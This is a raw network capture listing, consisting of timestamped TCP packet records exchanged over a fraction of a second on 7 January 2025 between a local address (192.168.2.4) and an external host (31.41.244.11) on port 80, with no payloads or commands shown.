Jan 7, 2025 10:09:05.708983898 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.708983898 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.708993912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.709006071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.709017992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.709017992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.709017992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.709031105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.709065914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.709065914 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.709086895 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.740258932 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740271091 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740364075 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740375996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740386963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740398884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740412951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.740513086 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.740515947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740530968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740544081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740555048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740581989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740592003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740592003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.740592003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.740606070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740617990 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740628004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740644932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.740677118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740679979 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.740695953 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.740696907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740716934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740729094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740732908 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.740742922 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740747929 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.740763903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.740786076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.740803003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740816116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740828037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.740880966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.740880966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.759474993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.759494066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.759524107 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.759535074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.759546995 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.759548903 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.759568930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.759582996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.759613037 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.759641886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792196989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792213917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792226076 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792304039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792304039 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792346001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792359114 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792371035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792383909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792406082 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792418003 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792422056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792433977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792469025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792474985 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792489052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792503119 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792516947 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792516947 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792517900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792541027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792541027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792546034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792560101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792565107 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792572021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792587996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792598009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792609930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792609930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792609930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792622089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792634964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792644978 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792649031 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792661905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792675018 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792691946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792691946 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792706966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792728901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792741060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792748928 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792773962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792773962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792776108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792794943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792797089 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792821884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792834044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792845964 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792857885 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792869091 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792901993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792901993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792915106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792931080 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792943954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792970896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792989969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.792999983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.792999983 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.793003082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.793015957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.793025970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.793051004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.793051004 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.793081999 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.794698954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.794744968 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.794756889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.794769049 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.794792891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.794796944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.794810057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.794836044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.794842958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.794842958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.794856071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.794867992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.794878960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.794889927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.794889927 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.794905901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.794923067 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.794934988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.794946909 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.794956923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.794956923 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.794958115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.794970989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.794976950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.794996023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795001030 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795013905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795027971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795038939 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795049906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795052052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795052052 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795062065 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795074940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795088053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795109034 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795116901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795147896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795180082 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795192003 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795202971 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795213938 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795244932 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795245886 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795258999 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795264006 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795279980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795291901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795300007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795304060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795331001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795331001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795345068 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795356989 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795362949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795368910 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795375109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795387983 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795393944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795399904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795406103 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795413017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795425892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795455933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795474052 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795476913 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795485973 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795499086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795521021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795526028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795552015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795562029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795572996 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795577049 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795586109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795589924 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795598984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795610905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795613050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795636892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795639038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795651913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795664072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.795706987 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.795706987 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.827089071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827114105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827152014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827172041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827184916 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.827188969 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827203035 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827244997 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827245951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.827245951 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.827265024 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827276945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827289104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827299118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827326059 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.827332020 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827343941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827354908 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827359915 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.827362061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827377081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827378988 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.827394962 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827404976 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827420950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.827435970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827451944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827474117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.827474117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.827476025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827487946 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827512980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.827558994 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.827567101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827584982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827639103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.827646017 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.827833891 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.846194029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.846208096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.846220016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.846231937 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.846256018 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.846288919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.846333981 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.846345901 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.846359015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.846368074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.846395969 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.846427917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879003048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879025936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879053116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879065037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879077911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879098892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879107952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879122019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879126072 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879133940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879144907 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879173040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879173040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879188061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879199982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879210949 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879228115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879231930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879231930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879265070 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879332066 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879338980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879352093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879362106 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879374027 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879384041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879415989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879415989 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879431009 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879475117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879486084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879497051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879522085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879523993 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879539967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879542112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879565001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879582882 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879587889 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879594088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879606009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879611015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879611015 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879617929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879632950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879662991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879663944 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879676104 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879688025 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879700899 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879718065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879741907 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879755974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879766941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879803896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879807949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879807949 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879816055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879828930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879853964 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879859924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.879883051 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.879909992 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.881290913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881311893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881326914 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881350040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881361961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.881361961 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.881362915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881426096 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.881439924 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881452084 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881478071 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881489038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881491899 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.881501913 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881514072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:05.881586075 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:05.881586075 CET	50017	80	192.168.2.4	31.41.244.11
